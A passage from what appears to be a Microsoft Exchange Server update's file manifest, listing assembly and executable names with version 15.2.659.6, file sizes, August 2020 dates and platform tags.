21:25| x64 \nMicrosoft.exchange.antispamupdate.eventlog.dll| 15.2.659.6| 15,752| 12-Aug-2020| 21:27| x64 \nMicrosoft.exchange.antispamupdatesvc.exe| 15.2.659.6| 27,016| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.approval.applications.dll| 15.2.659.6| 53,632| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.assistants.dll| 15.2.659.6| 925,056| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.assistants.eventlog.dll| 15.2.659.6| 25,984| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.assistants.interfaces.dll| 15.2.659.6| 43,400| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.audit.azureclient.dll| 15.2.659.6| 15,240| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.auditlogsearch.eventlog.dll| 15.2.659.6| 14,720| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 15.2.659.6| 70,528| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.dll| 15.2.659.6| 94,592| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.eventlog.dll| 15.2.659.6| 13,192| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.authadmin.eventlog.dll| 15.2.659.6| 15,744| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.authadminservicelet.dll| 15.2.659.6| 36,736| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.authservicehostservicelet.dll| 15.2.659.6| 15,744| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.autodiscover.configuration.dll| 15.2.659.6| 79,744| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.autodiscover.dll| 15.2.659.6| 396,152| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.autodiscover.eventlogs.dll| 15.2.659.6| 21,376| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.autodiscoverv2.dll| 15.2.659.6| 57,216| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.bandwidthmonitorservicelet.dll| 15.2.659.6| 14,720| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.batchservice.dll| 15.2.659.6| 35,712| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.cabutility.dll| 15.2.659.6| 276,352| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.certificatedeployment.eventlog.dll| 15.2.659.6| 16,256| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 15.2.659.6| 25,984| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.certificatenotification.eventlog.dll| 15.2.659.6| 13,696| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.certificatenotificationservicelet.dll| 15.2.659.6| 23,424| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.clients.common.dll| 15.2.659.6| 377,728| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.clients.eventlogs.dll| 15.2.659.6| 83,848| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.clients.owa.dll| 15.2.659.6| 2,971,016| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.clients.owa2.server.dll| 15.2.659.6| 5,029,760| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.clients.owa2.servervariantconfiguration.dll| 15.2.659.6| 893,824| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.clients.security.dll| 15.2.659.6| 413,568| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.clients.strings.dll| 15.2.659.6| 924,544| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.cluster.bandwidthmonitor.dll| 15.2.659.6| 31,624| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.cluster.common.dll| 15.2.659.6| 52,096| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.cluster.common.extensions.dll| 15.2.659.6| 21,888| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.cluster.diskmonitor.dll| 15.2.659.6| 33,664| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.cluster.replay.dll| 15.2.659.6| 3,515,264| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 15.2.659.6| 108,416| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 15.2.659.6| 288,640| 12-Aug-2020| 21:27| x64 \nMicrosoft.exchange.cluster.shared.dll| 15.2.659.6| 625,536| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.common.agentconfig.transport.dll| 15.2.659.6| 86,408| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.common.componentconfig.transport.dll| 15.2.659.6| 1,831,296| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.common.directory.adagentservicevariantconfig.dll| 15.2.659.6| 31,624| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.common.directory.directoryvariantconfig.dll| 15.2.659.6| 465,800| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.common.directory.domtvariantconfig.dll| 15.2.659.6| 25,480| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.common.directory.ismemberofresolverconfig.dll| 15.2.659.6| 38,272| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.common.directory.tenantrelocationvariantconfig.dll| 15.2.659.6| 102,792| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.common.directory.topologyservicevariantconfig.dll| 15.2.659.6| 48,520| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.common.diskmanagement.dll| 15.2.659.6| 67,464| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.common.dll| 15.2.659.6| 172,928| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.common.encryption.variantconfig.dll| 15.2.659.6| 113,544| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.common.il.dll| 15.2.659.6| 13,696| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.common.inference.dll| 15.2.659.6| 130,440| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.common.optics.dll| 15.2.659.6| 63,880| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.common.processmanagermsg.dll| 15.2.659.6| 19,848| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.common.protocols.popimap.dll| 15.2.659.6| 15,232| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.common.search.dll| 15.2.659.6| 108,928| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.common.search.eventlog.dll| 15.2.659.6| 17,792| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.common.smtp.dll| 15.2.659.6| 51,584| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll| 15.2.659.6| 36,744| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.common.transport.azure.dll| 15.2.659.6| 27,520| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.common.transport.monitoringconfig.dll| 15.2.659.6| 1,042,304| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.commonmsg.dll| 15.2.659.6| 29,056| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.compliance.auditlogpumper.messages.dll| 15.2.659.6| 13,184| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.compliance.auditservice.core.dll| 15.2.659.6| 181,120| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.compliance.auditservice.messages.dll| 15.2.659.6| 30,088| 12-Aug-2020| 21:27| x64 \nMicrosoft.exchange.compliance.common.dll| 15.2.659.6| 22,408| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.compliance.crimsonevents.dll| 15.2.659.6| 85,896| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.compliance.dll| 15.2.659.6| 41,352| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.compliance.recordreview.dll| 15.2.659.6| 37,256| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.compliance.supervision.dll| 15.2.659.6| 50,568| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.compliance.taskcreator.dll| 15.2.659.6| 33,160| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.compliance.taskdistributioncommon.dll| 15.2.659.6| 1,100,152| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.compliance.taskdistributionfabric.dll| 15.2.659.6| 206,728| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.compliance.taskplugins.dll| 15.2.659.6| 210,816| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.compression.dll| 15.2.659.6| 17,280| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.configuration.certificateauth.dll| 15.2.659.6| 37,768| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.configuration.certificateauth.eventlog.dll| 15.2.659.6| 14,216| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.configuration.core.dll| 15.2.659.6| 145,792| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.configuration.core.eventlog.dll| 15.2.659.6| 14,200| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.configuration.delegatedauth.dll| 15.2.659.6| 53,128| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.configuration.delegatedauth.eventlog.dll| 15.2.659.6| 15,752| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.configuration.diagnosticsmodules.dll| 15.2.659.6| 23,424| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.configuration.diagnosticsmodules.eventlog.dll| 15.2.659.6| 13,184| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.configuration.failfast.dll| 15.2.659.6| 54,664| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.configuration.failfast.eventlog.dll| 15.2.659.6| 13,704| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.configuration.objectmodel.dll| 15.2.659.6| 1,846,144| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.configuration.objectmodel.eventlog.dll| 15.2.659.6| 30,080| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.configuration.redirectionmodule.dll| 15.2.659.6| 68,472| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.configuration.redirectionmodule.eventlog.dll| 15.2.659.6| 15,240| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll| 15.2.659.6| 21,376| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll| 15.2.659.6| 13,176| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.connectiondatacollector.dll| 15.2.659.6| 25,976| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.connections.common.dll| 15.2.659.6| 169,856| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.connections.eas.dll| 15.2.659.6| 330,112| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.connections.imap.dll| 15.2.659.6| 173,952| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.connections.pop.dll| 15.2.659.6| 71,040| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.contentfilter.wrapper.exe| 15.2.659.6| 203,648| 12-Aug-2020| 21:27| x64 \nMicrosoft.exchange.context.client.dll| 15.2.659.6| 27,008| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.context.configuration.dll| 15.2.659.6| 51,584| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.context.core.dll| 15.2.659.6| 51,072| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.context.datamodel.dll| 15.2.659.6| 46,976| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.core.strings.dll| 15.2.659.6| 1,093,512| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.core.timezone.dll| 15.2.659.6| 57,216| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.data.applicationlogic.deep.dll| 15.2.659.6| 326,528| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.data.applicationlogic.dll| 15.2.659.6| 3,352,960| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.data.applicationlogic.eventlog.dll| 15.2.659.6| 35,712| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.data.applicationlogic.monitoring.ifx.dll| 15.2.659.6| 17,792| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.data.connectors.dll| 15.2.659.6| 165,256| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.data.consumermailboxprovisioning.dll| 15.2.659.6| 619,400| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.data.directory.dll| 15.2.659.6| 7,791,488| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.data.directory.eventlog.dll| 15.2.659.6| 80,264| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.data.dll| 15.2.659.6| 1,789,312| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.data.groupmailboxaccesslayer.dll| 15.2.659.6| 1,626,496| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.data.ha.dll| 15.2.659.6| 375,168| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.data.imageanalysis.dll| 15.2.659.6| 105,856| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.data.mailboxfeatures.dll| 15.2.659.6| 15,752| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.data.mailboxloadbalance.dll| 15.2.659.6| 224,648| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.data.mapi.dll| 15.2.659.6| 186,760| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.data.metering.contracts.dll| 15.2.659.6| 39,816| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.data.metering.dll| 15.2.659.6| 119,168| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.data.msosyncxsd.dll| 15.2.659.6| 968,072| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.data.notification.dll| 15.2.659.6| 141,192| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.data.personaldataplatform.dll| 15.2.659.6| 769,416| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.data.providers.dll| 15.2.659.6| 139,656| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.data.provisioning.dll| 15.2.659.6| 56,704| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.data.rightsmanagement.dll| 15.2.659.6| 452,992| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.data.scheduledtimers.dll| 15.2.659.6| 32,648| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.data.storage.clientstrings.dll| 15.2.659.6| 256,904| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.data.storage.dll| 15.2.659.6| 11,814,280| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.data.storage.eventlog.dll| 15.2.659.6| 37,752| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.data.storageconfigurationresources.dll| 15.2.659.6| 655,752| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.data.storeobjects.dll| 15.2.659.6| 175,488| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.data.throttlingservice.client.dll| 15.2.659.6| 36,224| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.data.throttlingservice.client.eventlog.dll| 15.2.659.6| 14,216| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.data.throttlingservice.eventlog.dll| 15.2.659.6| 14,208| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll| 15.2.659.6| 14,728| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.datacenterstrings.dll| 15.2.659.6| 72,584| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.delivery.eventlog.dll| 15.2.659.6| 13,192| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.diagnostics.certificatelogger.dll| 15.2.659.6| 22,920| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.diagnostics.dll| 15.2.659.6| 2,212,736| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.diagnostics.dll.deploy| 15.2.659.6| 2,212,736| 12-Aug-2020| 21:25| Not applicable \nMicrosoft.exchange.diagnostics.performancelogger.dll| 15.2.659.6| 23,936| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.diagnostics.service.common.dll| 15.2.659.6| 546,688| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.diagnostics.service.eventlog.dll| 15.2.659.6| 215,432| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.diagnostics.service.exchangejobs.dll| 15.2.659.6| 194,440| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.diagnostics.service.exe| 15.2.659.6| 146,312| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.diagnostics.service.fuseboxperfcounters.dll| 15.2.659.6| 27,512| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.diagnosticsaggregation.eventlog.dll| 15.2.659.6| 13,704| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.diagnosticsaggregationservicelet.dll| 15.2.659.6| 49,536| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.directory.topologyservice.eventlog.dll| 15.2.659.6| 28,024| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.directory.topologyservice.exe| 15.2.659.6| 208,768| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.disklocker.events.dll| 15.2.659.6| 88,968| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.disklocker.interop.dll| 15.2.659.6| 32,640| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.drumtesting.calendarmigration.dll| 15.2.659.6| 45,952| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.drumtesting.common.dll| 15.2.659.6| 18,816| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.dxstore.dll| 15.2.659.6| 473,480| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.dxstore.ha.events.dll| 15.2.659.6| 206,216| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.dxstore.ha.instance.exe| 15.2.659.6| 36,736| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.eac.flighting.dll| 15.2.659.6| 131,464| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 15.2.659.6| 21,888| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.edgesync.common.dll| 15.2.659.6| 148,352| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 15.2.659.6| 220,040| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.edgesync.eventlog.dll| 15.2.659.6| 23,944| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.edgesyncsvc.exe| 15.2.659.6| 97,664| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.ediscovery.export.dll| 15.2.659.6| 1,266,040| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.2.659.6| 1,266,040| 12-Aug-2020| 21:25| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 15,856| 12-Aug-2020| 21:25| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.exe.deploy| 15.2.659.6| 87,432| 12-Aug-2020| 21:25| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.manifest| Not applicable| 66,827| 12-Aug-2020| 21:25| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.strings.dll.deploy| 15.2.659.6| 52,096| 12-Aug-2020| 21:26| Not applicable \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.2.659.6| 292,224| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.2.659.6| 73,088| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.entities.booking.defaultservicesettings.dll| 15.2.659.6| 45,960| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.entities.booking.dll| 15.2.659.6| 218,504| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.entities.booking.management.dll| 15.2.659.6| 78,216| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.entities.bookings.dll| 15.2.659.6| 35,712| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.entities.calendaring.dll| 15.2.659.6| 936,832| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.entities.common.dll| 15.2.659.6| 336,256| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.entities.connectors.dll| 15.2.659.6| 52,616| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.entities.contentsubmissions.dll| 15.2.659.6| 32,136| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.entities.context.dll| 15.2.659.6| 60,800| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.entities.datamodel.dll| 15.2.659.6| 854,408| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.entities.fileproviders.dll| 15.2.659.6| 291,720| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.entities.foldersharing.dll| 15.2.659.6| 39,288| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.2.659.6| 76,168| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.entities.insights.dll| 15.2.659.6| 166,784| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.entities.meetinglocation.dll| 15.2.659.6| 1,486,720| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.entities.meetingparticipants.dll| 15.2.659.6| 122,248| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.entities.meetingtimecandidates.dll| 15.2.659.6| 12,327,296| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.entities.onlinemeetings.dll| 15.2.659.6| 264,064| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.entities.people.dll| 15.2.659.6| 37,760| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.entities.peopleinsights.dll| 15.2.659.6| 186,760| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.entities.reminders.dll| 15.2.659.6| 64,392| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.entities.schedules.dll| 15.2.659.6| 83,848| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.entities.shellservice.dll| 15.2.659.6| 63,880| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.entities.tasks.dll| 15.2.659.6| 100,232| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.entities.xrm.dll| 15.2.659.6| 144,768| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.entityextraction.calendar.dll| 15.2.659.6| 270,216| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.eserepl.common.dll| 15.2.659.6| 15,232| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.eserepl.configuration.dll| 15.2.659.6| 15,752| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.eserepl.dll| 15.2.659.6| 130,440| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.ews.configuration.dll| 15.2.659.6| 254,344| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 15.2.659.6| 13,176| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.2.659.6| 37,248| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.extensibility.internal.dll| 15.2.659.6| 640,896| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.extensibility.partner.dll| 15.2.659.6| 37,248| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.federateddirectory.dll| 15.2.659.6| 146,304| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.ffosynclogmsg.dll| 15.2.659.6| 13,184| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.frontendhttpproxy.dll| 15.2.659.6| 594,816| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.frontendhttpproxy.eventlogs.dll| 15.2.659.6| 14,712| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.frontendtransport.monitoring.dll| 15.2.659.6| 30,080| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.griffin.variantconfiguration.dll| 15.2.659.6| 99,720| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.2.659.6| 42,368| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.helpprovider.dll| 15.2.659.6| 40,320| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.2.659.6| 54,152| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.httpproxy.common.dll| 15.2.659.6| 164,224| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.2.659.6| 58,752| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.httpproxy.flighting.dll| 15.2.659.6| 204,160| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.httpproxy.passivemonitor.dll| 15.2.659.6| 17,792| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.2.659.6| 30,600| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.2.659.6| 38,792| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.2.659.6| 48,520| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.httpproxy.routing.dll| 15.2.659.6| 180,608| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.httpredirectmodules.dll| 15.2.659.6| 36,736| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.httputilities.dll| 15.2.659.6| 25,984| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.hygiene.data.dll| 15.2.659.6| 1,868,168| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.hygiene.diagnosisutil.dll| 15.2.659.6| 54,656| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.hygiene.eopinstantprovisioning.dll| 15.2.659.6| 35,704| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.idserialization.dll| 15.2.659.6| 35,712| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.imap4.eventlog.dll| 15.2.659.6| 18,304| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.imap4.eventlog.dll.fe| 15.2.659.6| 18,304| 12-Aug-2020| 21:26| Not applicable \nMicrosoft.exchange.imap4.exe| 15.2.659.6| 263,048| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.imap4.exe.fe| 15.2.659.6| 263,048| 12-Aug-2020| 21:26| Not applicable \nMicrosoft.exchange.imap4service.exe| 15.2.659.6| 24,968| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.imap4service.exe.fe| 15.2.659.6| 24,968| 12-Aug-2020| 21:25| Not applicable \nMicrosoft.exchange.imapconfiguration.dl1| 15.2.659.6| 53,128| 12-Aug-2020| 21:25| Not applicable \nMicrosoft.exchange.inference.common.dll| 15.2.659.6| 216,968| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.inference.hashtagsrelevance.dll| 15.2.659.6| 32,128| 12-Aug-2020| 21:27| x64 \nMicrosoft.exchange.inference.peoplerelevance.dll| 15.2.659.6| 281,992| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.inference.ranking.dll| 15.2.659.6| 18,824| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.inference.safetylibrary.dll| 15.2.659.6| 83,848| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.inference.service.eventlog.dll| 15.2.659.6| 15,232| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.2.659.6| 94,080| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.infoworker.common.dll| 15.2.659.6| 1,840,000| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.infoworker.eventlog.dll| 15.2.659.6| 71,552| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.2.659.6| 175,488| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.instantmessaging.dll| 15.2.659.6| 45,944| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.irm.formprotector.dll| 15.2.659.6| 159,624| 12-Aug-2020| 21:27| x64 \nMicrosoft.exchange.irm.msoprotector.dll| 15.2.659.6| 51,072| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.irm.ofcprotector.dll| 15.2.659.6| 45,952| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.isam.databasemanager.dll| 15.2.659.6| 32,128| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.isam.esebcli.dll| 15.2.659.6| 100,232| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.jobqueue.eventlog.dll| 15.2.659.6| 13,184| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.jobqueueservicelet.dll| 15.2.659.6| 271,240| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.killswitch.dll| 15.2.659.6| 22,400| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.killswitchconfiguration.dll| 15.2.659.6| 33,672| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.auditing.dll| 